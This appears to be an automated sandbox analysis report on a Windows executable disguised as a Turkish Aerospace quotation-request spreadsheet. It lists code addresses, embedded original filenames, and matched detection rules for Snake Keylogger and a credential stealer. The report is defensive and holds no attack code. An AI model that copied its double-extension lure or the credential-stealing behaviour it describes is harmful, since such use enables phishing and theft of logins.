Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_055D0006	10_2_055D0006
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_055DF801	10_2_055DF801
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_055D003F	10_2_055D003F
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_055DD0F8	10_2_055DD0F8
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_055DEB08	10_2_055DEB08
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_055D0B30	10_2_055D0B30
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_055D9328	10_2_055D9328
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_055D0B20	10_2_055D0B20
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_055D8B90	10_2_055D8B90
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_055DF3B8	10_2_055DF3B8
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_055DF3A8	10_2_055DF3A8
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_055D8BA0	10_2_055D8BA0
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_055DE258	10_2_055DE258
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_055DE249	10_2_055DE249
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Code function: 10_2_055DEAF8	10_2_055DEAF8
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_00DAC147	16_2_00DAC147
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_00DAD278	16_2_00DAD278
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_00DA5362	16_2_00DA5362
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_00DAC468	16_2_00DAC468
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_00DAC738	16_2_00DAC738
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_00DAE988	16_2_00DAE988
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_00DA69A0	16_2_00DA69A0
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_00DACA08	16_2_00DACA08
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_00DACCD8	16_2_00DACCD8
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_00DA9DE0	16_2_00DA9DE0
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_00DA6FC8	16_2_00DA6FC8
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_00DACFA9	16_2_00DACFA9
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_00DAF631	16_2_00DAF631
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_00DA29EC	16_2_00DA29EC
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_00DA39ED	16_2_00DA39ED
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_00DAE97A	16_2_00DAE97A
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_00DAFA88	16_2_00DAFA88
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_00DA3E09	16_2_00DA3E09
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_0651DE00	16_2_0651DE00
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_06511E80	16_2_06511E80
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_065117A0	16_2_065117A0
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_06519C18	16_2_06519C18
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_06519548	16_2_06519548
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_06510B30	16_2_06510B30
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_06515028	16_2_06515028
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_06512968	16_2_06512968
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_06511E70	16_2_06511E70
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_0651E6B0	16_2_0651E6B0
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_0651E6AF	16_2_0651E6AF
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_0651EF51	16_2_0651EF51
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_0651EF60	16_2_0651EF60
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_0651178F	16_2_0651178F
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_0651FC5E	16_2_0651FC5E
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_0651FC68	16_2_0651FC68
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_0651CC8F	16_2_0651CC8F
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_0651CCA0	16_2_0651CCA0
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_0651D550	16_2_0651D550
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_0651D540	16_2_0651D540
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_0651DDFF	16_2_0651DDFF
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_0651E258	16_2_0651E258
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_0651E24B	16_2_0651E24B
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_0651EAF8	16_2_0651EAF8
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_0651EB08	16_2_0651EB08
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_06510B20	16_2_06510B20
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_06519328	16_2_06519328
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_06518B90	16_2_06518B90
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_0651F3B8	16_2_0651F3B8
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_06518BA0	16_2_06518BA0
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_0651F3A8	16_2_0651F3A8
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_06510040	16_2_06510040
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_0651F810	16_2_0651F810
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_06515018	16_2_06515018
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_0651F803	16_2_0651F803
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_06510006	16_2_06510006
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_0651D0F8	16_2_0651D0F8
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_0651295A	16_2_0651295A
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_0651D999	16_2_0651D999
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Code function: 16_2_0651D9A8	16_2_0651D9A8

Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 00000000.00000002.2035924759.0000000002B11000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe
Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 00000000.00000002.2043259445.0000000007520000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe
Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 00000000.00000000.2007231634.0000000000732000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenametsUY.exeF vs T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe
Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 00000000.00000002.2036673189.00000000043DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe
Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 00000000.00000002.2036673189.00000000043DE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe
Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 00000000.00000002.2044319894.000000000B840000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe
Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 00000000.00000002.2033422411.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe
Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 00000000.00000002.2036673189.0000000003BCB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe
Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 00000000.00000002.2043053754.0000000007329000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenametsUY.exeF vs T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe
Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4484177904.0000000000B57000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe
Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Binary or memory string: OriginalFilenametsUY.exeF vs T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe

Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.WheTgQY.exe.411c3d0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.WheTgQY.exe.411c3d0.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.WheTgQY.exe.411c3d0.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.WheTgQY.exe.415f3f0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.WheTgQY.exe.415f3f0.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.WheTgQY.exe.415f3f0.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.WheTgQY.exe.415f3f0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.WheTgQY.exe.415f3f0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.WheTgQY.exe.415f3f0.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.WheTgQY.exe.411c3d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.WheTgQY.exe.411c3d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.WheTgQY.exe.411c3d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000009.00000002.2077441641.000000000411C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.2036673189.00000000043DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe PID: 3948, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: WheTgQY.exe PID: 5456, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.raw.unpack, COVID19.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.WheTgQY.exe.415f3f0.2.raw.unpack, COVID19.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.WheTgQY.exe.415f3f0.2.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.WheTgQY.exe.415f3f0.2.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, kkyuEWbsq1ZCQwxdXQ.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, kkyuEWbsq1ZCQwxdXQ.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, kkyuEWbsq1ZCQwxdXQ.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, kkyuEWbsq1ZCQwxdXQ.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, XSC45GRfM1SSKcDUtG.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, XSC45GRfM1SSKcDUtG.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, XSC45GRfM1SSKcDUtG.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
